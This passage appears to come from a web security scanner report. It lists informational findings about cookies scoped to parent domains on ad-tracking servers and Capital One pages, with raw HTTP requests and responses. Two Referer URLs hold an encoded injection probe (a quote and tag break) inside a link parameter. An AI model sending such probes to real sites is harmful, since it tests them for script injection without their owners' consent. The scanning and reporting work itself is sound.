Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.147. http://rs.gwallet.com/r1/pixel/x960r=772053252 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x960r=772053252

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4711632133175351424; Expires=Sun, 22-Jul-2012 04:49:14 GMT; Path=/; Domain=gwallet.com; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x960r=772053252 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=1311396557609b4824cb807cd&rand=1311396557610&uri=http://www.lijit.com/users/curse&informer=7713456&type=fpads&loc=http%3A%2F%2Fwww.curse.com%2F&rr=http%3A//c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html&ifr=1&v=1.0&csync=1
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://ap.lijit.com/www/delivery/retarget.php?a=r&r=radiumone
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711632133175351424; Expires=Sun, 22-Jul-2012 04:49:14 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Sun, 22-Jul-2012 04:49:14 GMT; Path=/; Domain=gwallet.com; Version=1

10.148. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=NQARAAgBNgABAMUABgACAAgBRAQHAAUBSQACAAgBSgACAAgBDAADAAgBHABdAOQA/QABAMUAXgACANkAXwACAAgB; path=/; expires=Tue, 22 Jul 2014 13:48:20 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=1&ti=12&sti=53&sts=1311428795483985&sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4; lgpr=//8=; lgdv12=1; lgtix=NQARAAgBNgABAMUABgABAMUARAQHAAUBSQABAMUASgABAMUADAABAMUAHABdAOQA/QABAMUAXgACANkAXwABAMUA

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:20 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: image/gif
Set-Cookie: lgtix=NQARAAgBNgABAMUABgACAAgBRAQHAAUBSQACAAgBSgACAAgBDAADAAgBHABdAOQA/QABAMUAXgACANkAXwACAAgB; path=/; expires=Tue, 22 Jul 2014 13:48:20 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 42
Connection: close

GIF89a.............!.......,...........D.;

10.149. http://sales.liveperson.net/hc/54909046/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/54909046/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1311366730:-1:-1:-1:-1; expires=Sat, 21-Jul-2012 20:32:13 GMT; path=/hc/54909046; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/54909046/?&site=54909046&cmd=mTagInPage&lpCallId=611663616495-300144530600&protV=20&lpjson=1&page=http%3A//www.capitalone.com/directbanking/%3Flinkid%3DWWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1&id=5181734412&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-ndb-sales-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4318047365754768807; HumanClickSiteContainerID_54909046=STANDALONE; LivePersonID=-16101514677756-1311366730:-1:-1:-1:-1; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311366729736

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:32:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_54909046=STANDALONE; path=/hc/54909046
Set-Cookie: LivePersonID=-16101514677756-1311366730:-1:-1:-1:-1; expires=Sat, 21-Jul-2012 20:32:13 GMT; path=/hc/54909046; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 22 Jul 2011 20:32:13 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"611663616495-300144530600","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

10.150. http://secure.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Thu, 20-Oct-2011 20:31:14 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)*ByB_/)_c8i>n(OvO%+k!>gb=k<L]x@47$x7ON=BYgX:LOm+2El3at(QTD1%X%tKHN20MbS3]oN@?0^icq.)WqZ-L0*<?]g:lxsO03.C*sW=.0_pG?t^a'8Mf-#S'5[7E6xJ1J/csbLRw>DloR/YQheG5?X.JEH):%9/pjaNt7'+ye3fn+Y^YVZ(^C$<E7[67kK'KrscR%!_*GCxzDe])o9T0%jT^3LabEhW.?3@@G<K$*?oVBh`ClP%OOM1AB7Y5QOr$rWPHinO#B][uMGW'uZjqwBkV]qiA/n9x8X3>?UfWlvU7wPM_qNBkqlohyh4$QcIzV!Y8*pDJreHsF[iF+7)jSZPc(>7HKZ9?eScuuYKX`RIc'L]NA61crsAXv37+/5/[v>bsH$8fr7!V1KW=$YWw2qUbSIewY3[?>OQ_l+('N9Qr2IFXH>*Oug<.cmlaM=InLt^M.9A?t$vnxZ6e-H1KX%1SGCU1w+usl0WpdsIikY/bb>H02KiB5fod`XVuZhAc?'LVk_S10rm/7THDt[HffIC7EAPuB7.wZXOGXy:2dIgius[HFQkA]<-I3meuqw$2Y6Fp[k^BVvPG!unc24tJRFyJh</Ae(Ocl*)Mm0Z=sngI-9KtSkKTEZ)S-CN4WlnLnI?PuBhpn:Mgu+@vOrnJ[vD048`ckxy93<yPgTivW'1amkQvsY`t7V4s3s0Ku9aT.hCT(f:<QkTABh0GgnT=':Z6d/?4(uE8^DMGpW]WxJ/nn^(]h[6i*o@Zu[)XN<:YzB=hAqECIs-FXY:%B_ZmoxH#9Dh@HC)^>; path=/; expires=Thu, 20-Oct-2011 20:31:14 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=100538&t=2 HTTP/1.1
Host: secure.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrLwCEAoYASABKAEwtuGY8QQKEgiZ1gIQChgDIAMoAzCh4ZjxBBC24ZjxBBgD; sess=1; uuid2=3420415245200633085; anj=Kfw)*ByDua)_c:>Y9r+T9#Ss!1.n<ZSu8l5TlRIT^:S3kP#Z+kZ8tcdDGm2'012%E*g#%**7rF<[<#)-Y>AWJ=D(')1P$_Z::x]'s$]lN4KGQy6K:OIt3:?:=r+3e.@IR']Q)u(LcyHJK`x/bZl2u%o>s1huV<QoWcXZ)9EI(9kJB67'2XOwI5xuO=2pL#b.qEf67kd0@$Sg:*75sDN?#1I^JM[QUkTH'coNTNMa9.>@wt/]+y`UBI4So+)qLp$]:2=.lH#S/a6t70Ol1)V^0ijH.+nwCju!j6^#+.v(:s!t6xI:rah/#b-z^7tI`G(68gF7r2]zvN$/Z>pYlA$!dIYI)@*UqG$UrdhMfkkS^EmOC^(]=Y+VrzsAa$@>SC)7Ft)ryqB-Dw5LS3tyT4Wp1?VxR'0F`B'3$<=lK3g[WZqQns$HQ!x0PFlnF:>7D6d_J0'o+SVBg_3UCfbMA[tf_TiSTiA)U0-.I-HqwN!XXx[NupSR3j.AUXXv[:HLBR4E44]vRp<s8K1FoGzyQRu8#+2Ha8eIg)7izEJ'W=7.w[CO6]GJHr$#?R=zNRNjy%pu3'%M+aI#PM!PH:S:R`wt'I7WR+nQxL':XV9d@f]rcDPrtXrp912ZfX.tPDD/90l8uJAwc:9)u1Zx'Gzt<4CDuRJ9+dPzgMVDl/MZ?PmgF-cq`x4HN9c!-.>3C!^4#v?3vb83hTsl?[Nk8ioBLaO)oGJLM?uU$((ezlBaX9Jy[uUG[8Xx'deo$%.QcLiJpuTr8A$PD+Kx+LV42GrQ1+hJ^)wwII`%k4oe

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 23-Jul-2011 20:31:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 20-Oct-2011 20:31:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)*ByB_/)_c8i>n(OvO%+k!>gb=k<L]x@47$x7ON=BYgX:LOm+2El3at(QTD1%X%tKHN20MbS3]oN@?0^icq.)WqZ-L0*<?]g:lxsO03.C*sW=.0_pG?t^a'8Mf-#S'5[7E6xJ1J/csbLRw>DloR/YQheG5?X.JEH):%9/pjaNt7'+ye3fn+Y^YVZ(^C$<E7[67kK'KrscR%!_*GCxzDe])o9T0%jT^3LabEhW.?3@@G<K$*?oVBh`ClP%OOM1AB7Y5QOr$rWPHinO#B][uMGW'uZjqwBkV]qiA/n9x8X3>?UfWlvU7wPM_qNBkqlohyh4$QcIzV!Y8*pDJreHsF[iF+7)jSZPc(>7HKZ9?eScuuYKX`RIc'L]NA61crsAXv37+/5/[v>bsH$8fr7!V1KW=$YWw2qUbSIewY3[?>OQ_l+('N9Qr2IFXH>*Oug<.cmlaM=InLt^M.9A?t$vnxZ6e-H1KX%1SGCU1w+usl0WpdsIikY/bb>H02KiB5fod`XVuZhAc?'LVk_S10rm/7THDt[HffIC7EAPuB7.wZXOGXy:2dIgius[HFQkA]<-I3meuqw$2Y6Fp[k^BVvPG!unc24tJRFyJh</Ae(Ocl*)Mm0Z=sngI-9KtSkKTEZ)S-CN4WlnLnI?PuBhpn:Mgu+@vOrnJ[vD048`ckxy93<yPgTivW'1amkQvsY`t7V4s3s0Ku9aT.hCT(f:<QkTABh0GgnT=':Z6d/?4(uE8^DMGpW]WxJ/nn^(]h[6i*o@Zu[)XN<:YzB=hAqECIs-FXY:%B_ZmoxH#9Dh@HC)^>; path=/; expires=Thu, 20-Oct-2011 20:31:14 GMT; domain=.adnxs.com; HttpOnly
Location: https://ad.yieldmanager.com/pixel?id=1165094&t=2
Date: Fri, 22 Jul 2011 20:31:14 GMT
Content-Length: 0

10.151. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJwtUUtLAmEURWcW06zmp/QD+gntC9q5a5G/IXWTkgRaiyyNySKI8g09JKESH4klVJQaRuADI6kxaARN+86hzeFw7v3OPfd+qqwYaUmVlY0ksDywCmyMLAI7Z1DaNSi+FrDXBA78siopx3Z1StFt2sFJzJCFWuLLvOhQlcmarN1frvehe/NW0T2eEzRFqxzNd0fg2z3wxAV4kMq+A0NzplW4h23a+b/7xxDFKp+mqmhxr0jCt6gIyEPt30I9vAM+m+i+4UYFZi56kcIxL8Jl45IW0QMmlojZsVsbHWUvMOCHV5FvSl1w4wuYGRK5Y8hgigm4kzNeOG+T1Z8ElPch5k1mxRavC1rQmeMWqy2o+oyg1zSpVtBc4ugKTWK80UMU1RJj6E/ALg9QZ88ew2Q9eGv+god5O9fYIuw7S4KeRiC/1SE/JsBDvEyBeV0T5IgriJREcZnyJ0+Yonvc4NQMsJXkz1D3pYHfTRhsTeN/eT0vDXo7kMOaoEfsrpkQPIuCejgoWgEGrvB3Y8xvuKU/RDC0gw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Sat, 21-Jul-2012 20:31:11 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=60596&partnerID=207&clientID=4795&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=f034cbc4-3674-4d22-be3a-aac76e8e10cb; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE1IjogWyIwMDQwMDMwMDE0MDAwMDA0NDk4NzIiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXSwgIjg0IjogWyJGejYrRVMvYzk5TzZ6NU9CIiwgdHJ1ZV19; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"609791\": [1311125511+ \"5865143651491006967\"+ 160196+ 103546+ 12332]+ \"678237\": [1311125559+ \"567377526065337370\"+ 4483+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"726658\": [1311125612+ \"B7F23440-C8B5-4684-BE17-08EC59EEAB9A\"+ 78882+ 35675+ 575]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuE4dJBNgFHizYMZH1kUGDVmfALSBowWYD6XDMfbiWwCnBLbobLLn88Fy26Hyq7/zyTAJNEOld38CKIXzOcS4bh9lQVo8pwNvz+wKDBoMBgwWDAARe8vZgPqOdJ1EUV04jJWoNrmTUtRRGfNALmtaS2q6NzHILXX7yxBEV0xHyT6rakVRXQN2IXP0ER7F4DMbTn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE774E+XjGhwYU0Z1Al2VJfHqPLCrKMfMHi0Ars8Si06jCu76yCExklDi3/P87ZOFZQDOuMUpcefnvHbLRZ1+wCjBL7Ht6D0X04yuw43ZdQBGdtREkeuv7QYQoAEpukas="; io_freq_p1="eJzjEua4mCTAKPHmwYyPLAaMFmCaS5xjSbwAl8R2EEeBQYMBKLEdKvHDRoBVoh1JAszmEuY4mCDAJHGk6+IHiASDBQNQsC8MaHbzpqUogi/jgYJNa1EF70QABa/fWYIkKMKxLVTgIJPEt6ZWFKXLEoBKW84+fY8s+DgGKHihYTOK4IVQoOBcNMGnAUDBGR8a3iPb9CNQoJVZYtFpVNFbgQITGSXOLf//DtmAzTECzBL7nt5DETwKsn/urgsogt3hQMFb3w8iBAHPUWOk"; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1311125618+ \"4\": 1305981633}"; segments_p1="eJwdUc1KAmEURWcWX7OaR+kBeoT2Be3ctahn6GeTkgRai6yMySKI8m+E/kioRLOhEipKiyLIokhqDDIY0+45m8PxeO6557tj6Mrd1wxdzdnAh7ZP8OzXL/hSA77uQv+N6oKNZyiRut/oUVbAXN9Ou7qhqa1RUR2ZMVR3RjcvD2ebcJfEranOgNBwCYM5Bq60gUUuWmwAswdQltqITQTMPcaKpQV5bRz7PzzwKoeCU5rklpVACb+b53Dc0r1xAX7Kt5TDUE7YYnxQID0qDQsZzUxasRY2RF7gOKMvFkVWmS903sDdL2DeA8Zdct5lgum5Lvg9t85T/8lCf/ewr9svdJqHehwylyaKPJTVJ+oxo9K8RYXjDgtUKxi/SuFfhzWsG+Abn35H5yrLFEJwtv7AE7zmZMcn8a8jQneSkJ/uIMd5jesslBO2nuyiXUahnQ15jPInT5hjesbl1jywbvMTUI/sA795zoVefFReL8yAxjL4pocaCVNojX1DNoTQsNBUBeOxI3y7DvY/BLV/HQey3Q=="

Response

HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 20:31:11 GMT
Set-Cookie: segments_p1="eJwtUUtLAmEURWcW06zmp/QD+gntC9q5a5G/IXWTkgRaiyyNySKI8g09JKESH4klVJQaRuADI6kxaARN+86hzeFw7v3OPfd+qqwYaUmVlY0ksDywCmyMLAI7Z1DaNSi+FrDXBA78siopx3Z1StFt2sFJzJCFWuLLvOhQlcmarN1frvehe/NW0T2eEzRFqxzNd0fg2z3wxAV4kMq+A0NzplW4h23a+b/7xxDFKp+mqmhxr0jCt6gIyEPt30I9vAM+m+i+4UYFZi56kcIxL8Jl45IW0QMmlojZsVsbHWUvMOCHV5FvSl1w4wuYGRK5Y8hgigm4kzNeOG+T1Z8ElPch5k1mxRavC1rQmeMWqy2o+oyg1zSpVtBc4ugKTWK80UMU1RJj6E/ALg9QZ88ew2Q9eGv+god5O9fYIuw7S4KeRiC/1SE/JsBDvEyBeV0T5IgriJREcZnyJ0+Yonvc4NQMsJXkz1D3pYHfTRhsTeN/eT0vDXo7kMOaoEfsrpkQPIuCejgoWgEGrvB3Y8xvuKU/RDC0gw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Sat, 21-Jul-2012 20:31:11 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1306570&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

10.152. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

partnerUID="eyIxMTUiOiBbIjRlMjgyYmE5MGNlYTAwNmYiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 22-Jul-2012 13:15:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=115&partnerUID=4e282ba90cea006f&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh46.html
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; segments_p1="eJzjYuFYe5OZi4ujfTOTwJT9tz+ycLFw3F7HBBTZtpZJ4MHnfZ9YgOzbrSwCbz8C2QCDiBIG"; exchange_uid="eyI0IjogWyJDQUVTRUFJZzV6LU5XTi11dzdXV2FfS18tYTgiLCA3MzQzMzldfQ=="; partnerUID="eyIxMTUiOiBbIjRlMjgyYmE5MGNlYTAwNmYiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 23 Jul 2011 13:15:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 23-Jul-2011 13:15:00 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMjgyYmE5MGNlYTAwNmYiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 22-Jul-2012 13:15:20 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.153. http://segments.adap.tv/data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

audienceData="{\"v\":2,\"providers\":{\"24\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data?p=quantcast-adaptv&type=gif&segment=D&add=true HTTP/1.1
Host: segments.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A28"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"; adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"24\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:15 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

10.154. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/?p=exelate&uid=1234567&sid=2222&ag=!!AGE!!&seg= HTTP/1.1
Host: segments.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A28"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"; adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1313910000,\"e\":1313910000,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:14 GMT
Content-Length: 0

10.155. https://servicing.capitalone.com/c1/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://servicing.capitalone.com
Path:	/c1/login.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ssotgt=f2eos; domain=capitalone.com; path=/;HttpOnly
VS_COOKIE=Login; domain=capitalone.com; path=/;HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c1/login.aspx HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
